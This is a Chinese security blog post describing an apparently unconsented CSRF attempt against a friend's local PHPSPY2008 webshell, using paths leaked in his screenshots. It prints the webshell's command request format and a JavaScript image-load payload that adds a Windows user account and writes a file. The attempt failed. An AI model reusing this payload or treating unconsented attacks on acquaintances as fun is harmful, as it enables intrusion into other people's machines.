5up3rh3i'blog［提供有偿web代码安全审计服务］

版权声明：转载时请以超链接形式标明文章原始出处和作者信息及本声明
http://superhei.blogbus.com/logs/12289653.html

Just a fun

前几天看angel的blog得知道他正在写PHPSPY2008:http://www.sablog.net/blog/phpspy-2008/,并且给了很多测试截图片,like:

http://www.sablog.net/blog/attachment.php?id=543

在这些图片里,angel暴露了他的很多信息,比如本地的web server的连接和相对路径:
http://localhost/phpspy/2008.php
绝对路径:F:/www/phpspy/
同一个目录下还有PHPSPY2007和PHPSPY2006等版本

还有他的本地mysql的一些结构:包括库名,主要还有一些前缀,我记得还有一张还有一些用户的md5的hash [现在好象删除了:)]，还有angel用的是Maxthon 2.06

这些信息直接给出来是很危险的,于是我决定测试下看我可以不可以根据这些信息可不可以own angel's box. [just a fun]:

思路1:尝试那些md5 hash
思路2:直接使用csrf 通过http://localhost/phpspy/2008.php直接执行命令

思路1正在尝试起来很麻烦,而且也不是真正想黑,思路2行动起来比较容易,很直观.而且我还可以弥补在文
《xss/csrf in penetration test》[1]没有用csrf攻击的遗憾。首先先了解2008.php执行命令变量提交，当时我还没有2008.php，不知道angel有没有改，不过看他的目录下还有2006和2007。但是就在这个时候angel联系我要我们群里的朋友测试2008.php，哈哈时候到了....

于是我看了一下2008.php执行命令提交的格式：

POST /2008.php?action=shell HTTP/1.1
...............

execfunc=system&command=net+user&submit=%C8%B7%B6%A8

我们换get提交看可以不，提交：2008.php?action=shell&execfunc=system&command=net user 一样可以，看来是用的Request变量[2]

ok，angel用的是Maxthon 2.06是ie内核心，应该没有ff上的noscript那样的安全插件，我们可以用js：

<script>
var url = 'http://localhost/phpspy/2008.php?action=shell&execfunc=system&command=net user heige heige /add|echo fuck >c:\\heige.txt';
getURL(url);
function getURL(s) {
    var image = new Image();
    image.style.width = 0;
    image.style.height = 0;
    image.src = s;
}
</script>

然后把他放到我的一个空间的2008.php的里面，然后就等发给angel去测试了，不过等我搞完angel已经不在线，只好等第2天了，第2天下班angel在线，于是我在群里说2008.php在我的空间显示不怎么理想，angel果然link进去了.....


结果：我没有成功，angel说他根本没有登陆他的http://localhost/phpspy/2008.php，居然测试代码不登陆！！！，不过应该有cookie保存的啊，不过angel说他计算机问题cookie保存不了！！！！！ 天意~~~， 一切都是天意！ :)

最后：xss/csrf真的很险恶，防不甚防。说不顶我在写这个文章的时候，有个人正在2个眼睛看这个我打字呢.....

[1]：http://superhei.blogbus.com/logs/11257167.html
[2]：http://superhei.blogbus.com/logs/11412189.html

update:http://superhei.blogbus.com/logs/23466639.html 导致失败的原因